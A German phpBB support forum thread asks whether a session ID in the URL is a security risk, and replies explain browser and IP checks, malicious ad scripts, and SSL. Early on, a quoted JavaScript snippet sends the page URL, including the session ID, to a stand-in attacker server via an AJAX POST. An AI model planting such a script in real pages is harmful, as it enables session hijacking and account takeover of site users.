3.2.0 Sicherheitsproblem: SID in URL

[NicoM]

Hallo,

bei uns im Forum macht jemand die Pferde scheu und erzählt folgendes:

Die SID in der Url ist definitiv ein Sicherheitsproblem. In Verbindung mit der unkontrollierten Werbung, die ihr hier schaltet, kann man ohne Weiteres Kundenkonten übernehmen. Soll ich dir ein Javascript bauen, mit dem ich die Loginurl abgreife? Dann schalte ich nur noch eine Werbeanzeige mit dem Script und warte, bis die hier geladen wird...
CODE: ALLES AUSWÄHLEN
<script type="text/javascript">
// url mit SID übernehmen
var urlMitSid = window.location.href;

// und jetzt zu meinem server schicken
$.ajax({
type: "POST",
url: "http://www.meinboeserbackend.de/forumshack",
data: urlMitSid
});
</script>
Jetzt brauche ich nur noch zu warten, bis die Urls bei mir ankommen und schön in der DB gespeichert werden. Die Links rufe ich nacheinander auf und lese PNs oder ändere Passwörter.

Nur weil man nicht weiß, wie man etwas fixt, heißt es nicht, dass ein Problem nicht existiert. Auch wenn die SID auf den Folgeseiten nicht mehr sichtbar ist, hilft dir nicht weiter. Einmal sichtbar in der URL reicht.

Was ist daran wahr? Was ist zu tun, um ein eventuelles Sicherheitsproblem abzustellen?

Danke für Eure Hilfe

[tas2580]

Da ist nichts dran da zusätzlich zur SID noch Browser und IP geprüft werden. Das kannst du ja ganz einfach mal selber ausprobieren. Öffne das Forum in Browser A und melde dich an, kopiere die URL mit SID und öffne sie in Browser B. Du wirst sehen, dass du in Browser B nicht angemeldet bist obwohl IP und SID stimmen.

Gruß Tobi

[NicoM]

Herzlichen Dank, Tobi.

Grüße,

[canonknipser]

Und wenn das so eine kritische Sicherheitslücke (die wenn dann schon seit 3.0.0 existiert) wäre, die dein "Experte" so einfach ausnutzen kann, wäre die sicherlich beim professionellen Sicherheitsaudit, das für phpBB 3.0 durchgeführt wurde, aufgefallen: https://www.phpbb.com/about/features/#audit und https://www.phpbb.com/community/viewtop ... 4&t=584879
Meines Wissens werden weiterhin regelmäßige Audits durchgeführt

[Talk19zehn]

Hm, irgendwo *hake ich, oder liege ich falsch? Das Problem liegt doch aber ganz woanders(?): Wenn Schadcode eingebunden wird, ist Hopfen und Malz verloren, denn dann ist generell alles (!) möglich. Selbst wenn der Schadcode getarnt als Werbung daher kommt! Eingebundene Scripte sollten halt stets überprüft werden - bzw. in der Praxis: ihnen sollte hinreichend vertraut werden.

Mit der SID in der URL hat das aber wirklich gar nichts zu tun, denn sonst steht sie im Cookie und kann dort (mehr oder weniger) genauso gut ausgelesen werden. Nur weil man Cookies nicht sieht, heißt das nicht, dass es sie nicht gibt. Oder ganz pauschal: Irgendwann wird man sein Passwort ja mal eintippen müssen und dann kann es per Script ebenso ausgelesen werden. Nach der Logik darf man sich gar nicht mehr anmelden.

Einziges Debakel der URL ist, dass Nutzer diese gerne kopieren. Hier greift dann halt der Browser- und IP-Schutz, auch wenn man bei wechselnder IP deswegen immer rausgeworfen wird.

*Oder was

[tas2580]

OK Schadcode in Werbung ist ein ganz anderes Problem, siehe: https://www.youtube.com/watch?v=zJUmjtjCtY8

Cookies lassen sich nur von der Domain auslesen von der sie gesetzt wurden, da ist es also nicht ganz so einfach ran zu kommen. Damit man das Passwort beim eingeben nicht auslesen kann sollte man unbedingt SSL verwenden dann ist das auch nicht mehr ganz so einfach.

Am besten bindet man gar keine Scripte/Bilder von fremden Domains ein. Wegen den paar €uro die man für Werbung bekommt sollte man einfach die Sicherheit seiner User nicht gefährden.

Gruß Tobi

[NeXoLiiNe]

Bei mir wird auch die SID in der Url angezeigt , kann mich aber daran erinnern das die SID normalerweise nicht dort steht sondern NUR -> domain.de/viewforum.php usw.

Kann man das zufällig irgendwo erzwingen ?

[Melmac]

Hi,

wie lauten die Cookie-Einstellungen des Boards?

[NeXoLiiNe]

Cookies

Code: Alles auswählen

Cookie-Domain: .domain.net
Cookie-Name: Domain
Cookie-Pfad: /

Sicherer Server : ✔

Aber nun hat er die SID aus irgendwelchen Gründen entfernt als ich das "https://" Protokoll in der .htaccess erzwungen habe.
Komische Sachen aber nun gut ich Beschwere mich nicht es funktioniert nun so wie ich das gerne möchte


MfG